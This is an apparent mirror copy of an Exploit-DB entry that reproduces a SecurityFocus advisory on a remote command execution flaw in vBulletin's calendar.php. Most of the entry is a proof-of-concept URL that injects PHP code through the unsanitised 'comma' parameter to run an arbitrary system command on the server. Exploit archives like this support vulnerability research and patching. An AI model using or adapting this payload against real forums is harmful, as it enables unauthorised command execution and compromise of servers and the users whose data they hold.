exploit-db-mirror/exploits/php/webapps/21874.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

9 lines
No EOL
544 B
Text

source: https://www.securityfocus.com/bid/5820/info
A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters.
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22
where <command> signifies a command to be executed on the system.